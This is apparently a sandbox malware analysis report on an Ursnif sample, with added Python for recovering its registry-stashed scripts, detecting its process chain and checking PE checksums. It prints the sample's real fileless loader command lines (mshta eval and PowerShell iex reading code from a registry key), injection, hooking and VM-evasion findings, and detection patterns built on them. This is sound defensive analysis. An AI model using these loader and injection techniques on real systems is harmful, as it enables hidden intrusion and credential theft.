Source: Binary string: Y:\ruach\endeared\unroaded\warl\homolographic\palpableness.pdb source: regsvr32.exe, 00000001.00000002.484369961.0000000004930000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000001F.00000002.447514159.000002090E7CC000.00000004.00000040.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.pdbXP source: powershell.exe, 00000016.00000002.479298049.0000020E941EB000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 0000001E.00000000.440194854.000000000DE20000.00000002.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
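The two loader command lines above fetch their script bodies from the registry rather than from a file: mshta.exe eval()s whatever regread() returns for the Audiinrt value, so that value must be a string, and powershell.exe passes the Barclers value through [System.Text.Encoding]::ASCII.GetString, so that one is stored as raw bytes (REG_BINARY). Because the RegGetValueW hook the report lists under "Hooks registry keys query functions" exists to hide this key from a user browsing it in explorer.exe, an export taken outside that process (reg.exe export of the key, or the offline NTUSER.DAT hive) is the reliable way to recover the staged code. The following Python is an added example, not part of this report or of the sample: it parses a .reg export of the 54E80703-A337-A6B8-CDC8-873A517CAB0E key and decodes both values the way the two loaders do. The .reg text and the placeholder script contents in it are constructed; only the key path and the value names Audiinrt and Barclers come from the report.

```python
import re

# Constructed stand-in for the output of
#   reg export "HKCU\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E" stash.reg
# The key path and the value names are the report's; the value contents are
# placeholders, not the sample's real scripts.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E]
"Audiinrt"="window.flag=1;new ActiveXObject(\"WScript.Shell\").Run(\"powershell ...\")"
"Barclers"=hex:24,63,6f,64,65,3d,22,70,6c,61,63,65,68,6f,6c,64,65,72,22,0d,0a,\
  41,64,64,2d,54,79,70,65,20,24,63,6f,64,65,0d,0a
"Client"=dword:00000001
'''

STASH_KEY = (r"HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft"
             r"\54E80703-A337-A6B8-CDC8-873A517CAB0E")

_VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def _unescape(s):
    # reg export escapes " and \ with a backslash.
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg_export(text):
    """Parse a .reg (v5) export into {key: {value_name: (type, value)}}.

    Covers the value kinds a loader stash like this one uses: quoted strings
    (REG_SZ), hex: byte lists with backslash line continuations (REG_BINARY)
    and dword:. Other kinds are kept raw under 'UNKNOWN'.
    """
    # A trailing backslash continues a hex list on the next line.
    text = re.sub(r'\\\r?\n\s*', '', text)
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(';'):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if not m or current is None:
            continue
        name, raw = _unescape(m.group(1)), m.group(2)
        if raw.startswith('"') and raw.endswith('"'):
            keys[current][name] = ('REG_SZ', _unescape(raw[1:-1]))
        elif raw.startswith('hex:'):
            keys[current][name] = ('REG_BINARY', bytes.fromhex(raw[4:].replace(',', '')))
        elif raw.startswith('dword:'):
            keys[current][name] = ('REG_DWORD', int(raw[6:], 16))
        else:
            keys[current][name] = ('UNKNOWN', raw)
    return keys


def recover_stash(reg_text, key=STASH_KEY):
    """Return the staged scripts as the loaders see them.

    REG_SZ values come back as-is (what mshta's regread() hands to eval());
    REG_BINARY values are ASCII-decoded, mirroring the powershell line's
    [System.Text.Encoding]::ASCII.GetString call (non-ASCII bytes become U+FFFD
    here, '?' in .NET). DWORDs and other kinds are not script bodies and are skipped.
    """
    scripts = {}
    for name, (kind, value) in parse_reg_export(reg_text).get(key, {}).items():
        if kind == 'REG_SZ':
            scripts[name] = value
        elif kind == 'REG_BINARY':
            scripts[name] = value.decode('ascii', errors='replace')
    return scripts


if __name__ == '__main__':
    for name, body in recover_stash(SAMPLE_REG).items():
        print(f'--- {name} ({len(body)} chars) ---')
        print(body)
```

Run it against a real export and the printed bodies are the JScript that mshta.exe evaluates and the PowerShell that the iex line executes; diffing a later export against this one also shows whether the stash was rotated, which the "Registry key monitored for changes" finding below suggests the injected explorer.exe code watches for.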
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
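The chain the report reconstructs is regsvr32.exe → control.exe → rundll32.exe for the native stage and mshta.exe → powershell.exe → csc.exe for the fileless stage, with explorer.exe later running nslookup against myip.opendns.com to learn the victim's public address. The Sigma hits listed in the overview (MSHTA Spawning Windows Shell, Suspicious Csc.exe Source File Folder, the suspicious PowerShell command line) reduce to parent/child and command-line predicates over process-creation telemetry. The Python below is an added example, not part of the report or of any published rule set: it encodes those predicates as functions and runs them over constructed process-creation events whose images, parents and command lines are copied from the report's process tree (the sandbox records mshta.exe's parent as unknown, and the example keeps it that way).

```python
import re

# Constructed process-creation events. Image, parent and command line follow
# the report's process tree; nothing here is taken from a real EDR log.
EVENTS = [
    {"parent": r"C:\Windows\System32\loaddll32.exe",
     "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmd": r"regsvr32.exe /s C:\Users\user\Desktop\vnaSKDMnLG.dll"},
    {"parent": r"C:\Windows\SysWOW64\regsvr32.exe",
     "image": r"C:\Windows\System32\control.exe",
     "cmd": r"C:\Windows\system32\control.exe -h"},
    {"parent": r"C:\Windows\System32\control.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h"},
    {"parent": "unknown",   # the sandbox could not attribute mshta.exe's parent
     "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);"
            r"eval(new ActiveXObject('WScript.Shell').regread('HKCU\\Software\\AppDataLow\\Software"
            r"\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\Audiinrt'));if(!window.flag)close()</script>'"},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]"
            r"::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft"
            r"\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmd": r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths "
            r"@'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\4EC0.bi1'"},
]

SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def mshta_spawns_shell(e):            # Sigma: MSHTA Spawning Windows Shell
    return basename(e["parent"]) == "mshta.exe" and basename(e["image"]) in SHELLS


def mshta_inline_hta_script(e):       # whole HTA on the command line, code pulled from the registry
    return basename(e["image"]) == "mshta.exe" and bool(
        re.search(r"about:<hta:application>|\.regread\(", e["cmd"], re.I))


def powershell_iex_from_registry(e):  # iex over Get-ItemProperty output from HKCU/HKLM
    return basename(e["image"]) == "powershell.exe" and all(
        re.search(p, e["cmd"], re.I)
        for p in (r"\b(iex|invoke-expression)\b", r"\b(gp|get-itemproperty)\b", r"\bHK(CU|LM):"))


def csc_compiles_from_temp(e):        # Sigma: Suspicious Csc.exe Source File Folder
    return basename(e["image"]) == "csc.exe" and bool(
        re.search(r"@['\"]?[^'\" ]*\\AppData\\Local\\Temp\\", e["cmd"], re.I))


def external_ip_discovery(e):         # nslookup myip.opendns.com resolver1.opendns.com
    return bool(re.search(r"myip\.opendns\.com|resolver1\.opendns\.com", e["cmd"], re.I))


def regsvr32_spawns_control(e):       # regsvr32 has no reason to launch the Control Panel host
    return basename(e["parent"]) == "regsvr32.exe" and basename(e["image"]) == "control.exe"


RULES = [mshta_spawns_shell, mshta_inline_hta_script, powershell_iex_from_registry,
         csc_compiles_from_temp, external_ip_discovery, regsvr32_spawns_control]


def evaluate(event):
    """Names of the rules that fire on one event, in RULES order."""
    return [rule.__name__ for rule in RULES if rule(event)]


def scan(events):
    """Map each event's image basename to the rules that fired on it."""
    return {basename(e["image"]): evaluate(e) for e in events}


if __name__ == "__main__":
    for image, hits in scan(EVENTS).items():
        print(f"{image:16s} {', '.join(hits) or '-'}")
```

The regsvr32 /s and rundll32 Control_RunDLL events fire nothing on their own, which is the point: the first is how any COM DLL is registered and the second is how control.exe always works, so the signal in this chain comes from the parent relationship (regsvr32 → control) and from the mshta/powershell/csc command lines, not from the binaries involved.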
PE file contains an invalid checksum
Source: q3xypckz.dll.24.dr Static PE information: real checksum: 0x0 should be: 0x156e
Source: vnaSKDMnLG.dll Static PE information: real checksum: 0x42d78 should be: 0x3f8ff
Source: chv50z53.dll.26.dr Static PE information: real checksum: 0x0 should be: 0x35c9
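The "real checksum ... should be" lines compare the OptionalHeader.CheckSum stored in the file with the value recomputed over the file body. A stored 0, as in the two DLLs that csc.exe just built, only means the field was never filled in; a non-zero mismatch like 0x42d78 versus 0x3f8ff on vnaSKDMnLG.dll means the bytes were changed after linking or the field was written with a bogus value, which is a cheap triage signal for packed or patched samples (the loader ignores the field for ordinary user-mode images, so a wrong value never stops the file from running). The Python below is an added example, not code from the report: it reimplements the checksum algorithm (32-bit word sum with end-around carry, skipping the CheckSum field, folded to 16 bits, plus the file length) and exercises it on a constructed 512-byte header stub.

```python
import struct


def checksum_field_offset(data):
    """Offset of OptionalHeader.CheckSum: e_lfanew + 'PE\\0\\0' + 20-byte COFF
    header + 64. The field sits at the same place for PE32 and PE32+."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return e_lfanew + 4 + 20 + 64


def pe_checksum(data):
    """Recompute the image checksum the way ImageHlp's CheckSumMappedFile does:
    sum every 32-bit word except the CheckSum field with end-around carry,
    fold the result to 16 bits, then add the unpadded file length."""
    skip = checksum_field_offset(data) // 4
    padded = bytes(data) + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(0, len(padded), 4):
        if i // 4 == skip:
            continue
        total += struct.unpack_from("<I", padded, i)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = total + (total >> 16)
    return (total & 0xFFFF) + len(data)


def stored_checksum(data):
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def check(data):
    """(stored, computed, matches). Stored 0 means 'never set'; a non-zero
    mismatch means the file changed after linking or the field was faked."""
    stored, computed = stored_checksum(data), pe_checksum(data)
    return stored, computed, stored == computed


def with_checksum(data):
    """Copy of the image with a correct CheckSum written into the header."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, checksum_field_offset(buf), pe_checksum(buf))
    return bytes(buf)


def synthetic_image():
    """Constructed 512-byte stub: MZ, e_lfanew = 0x80, PE signature, and a
    zeroed COFF/optional header. Enough for the checksum walk, not loadable."""
    buf = bytearray(0x200)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)
    buf[0x80:0x84] = b"PE\0\0"
    return bytes(buf)


if __name__ == "__main__":
    img = synthetic_image()
    print("stub:  stored=%#x computed=%#x ok=%s" % check(img))
    print("fixed: stored=%#x computed=%#x ok=%s" % check(with_checksum(img)))
```

On a real file, read it fully into memory and call check() on the bytes; the stub's value (0xA21D) is the sum of the only three non-zero words (the 'MZ' magic, e_lfanew and the 'PE' signature) plus its 0x200-byte length, which is a handy sanity check when porting the routine.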
Registers a DLL
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\vnaSKDMnLG.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A8B09B push ecx; ret 1_2_04A8B0AB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A8ACE0 push ecx; ret 1_2_04A8ACE9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_0493009C push dword ptr [ebp-000000D8h]; ret 1_2_04930252
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_0493009C push dword ptr [ebp-000000E0h]; ret 1_2_0493029C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_0493009C push dword ptr [esp+10h]; ret 1_2_049303AB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04930005 push dword ptr [ebp-000000D8h]; ret 1_2_04930065
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04930066 push dword ptr [ebp-000000D8h]; ret 1_2_0493009B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049303AC push dword ptr [esp+0Ch]; ret 1_2_049303BF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049303AC push dword ptr [esp+10h]; ret 1_2_04930404

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6968, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4360, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4760, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFFAC2D5200
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFFAC2D521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5743
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3025
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4404 Thread sleep time: -7378697629483816s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\SysWOW64\WerFault.exe File opened: PhysicalDrive0
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A842B4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_04A842B4
Source: explorer.exe, 0000001E.00000000.437556746.0000000008C73000.00000004.00000001.sdmp Binary or memory string: 30d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.437107057.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000001E.00000000.437107057.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000001E.00000000.431890045.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001E.00000000.437305714.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.437305714.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000001E.00000002.527114908.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000015.00000002.387243962.000001AB9F6F5000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[h
Source: explorer.exe, 0000001E.00000000.437180572.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 0000001E.00000000.437305714.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 0000001E.00000000.437180572.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000001E.00000000.433905320.00000000069DB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: explorer.exe, 0000001E.00000000.431890045.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001E.00000000.431890045.00000000059C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001E.00000000.431890045.00000000059C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_0493009C mov eax, dword ptr fs:[00000030h] 1_2_0493009C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04930476 mov eax, dword ptr fs:[00000030h] 1_2_04930476
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049303AC mov eax, dword ptr fs:[00000030h] 1_2_049303AC
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WerFault.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 26754260000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2433E7D0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 24E31E50000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFFAE131580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: AE131580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: AE131580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: AE131580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: AE131580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: AE131580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: AE131580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3292 base: CF2000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3292 base: 7FFFAE131580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3292 base: 2FC0000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3292 base: 7FFFAE131580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
